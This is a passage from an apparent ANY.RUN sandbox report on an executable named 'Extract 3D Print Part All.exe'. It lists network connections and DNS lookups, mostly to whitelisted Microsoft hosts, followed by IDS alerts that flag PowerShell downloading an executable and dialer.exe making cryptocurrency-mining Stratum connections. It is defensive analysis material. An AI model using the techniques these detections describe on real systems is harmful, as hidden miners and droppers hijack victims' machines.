http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6192
SIHClient.exe
GET
200
92.123.22.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.180:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2508
svchost.exe
23.48.23.180:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
2.19.217.218:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
2508
svchost.exe
2.19.217.218:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
23.212.110.200:443
www.bing.com
Akamai International B.V.
CZ
whitelisted
23.67.160.244:80
ocsp.digicert.com
AKAMAI-AS
JP
whitelisted
1176
svchost.exe
20.190.160.65:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1176
svchost.exe
23.67.160.244:80
ocsp.digicert.com
AKAMAI-AS
JP
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 23.48.23.180
  • 23.48.23.177
  • 23.48.23.145
  • 23.48.23.159
  • 23.48.23.176
  • 23.48.23.167
  • 23.48.23.156
  • 23.48.23.164
  • 23.48.23.194
whitelisted
www.microsoft.com
  • 2.19.217.218
  • 92.123.22.101
whitelisted
google.com
  • 142.250.186.110
whitelisted
www.bing.com
  • 23.212.110.200
  • 23.212.110.209
  • 23.212.110.219
  • 23.212.110.201
  • 23.212.110.208
  • 23.212.110.217
  • 23.212.110.187
  • 23.212.110.136
  • 23.212.110.137
whitelisted
ocsp.digicert.com
  • 23.67.160.244
  • 2.23.77.188
whitelisted
login.live.com
  • 20.190.160.65
  • 40.126.32.68
  • 20.190.160.131
  • 20.190.160.17
  • 20.190.160.66
  • 40.126.32.134
  • 20.190.160.14
  • 40.126.32.140
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
6644
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6644
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
6644
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7208
dialer.exe
Crypto Currency Mining Activity Detected
ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
7208
dialer.exe
Crypto Currency Mining Activity Detected
ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
7208
dialer.exe
Crypto Currency Mining Activity Detected
ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Extract 3D Print Part All.exe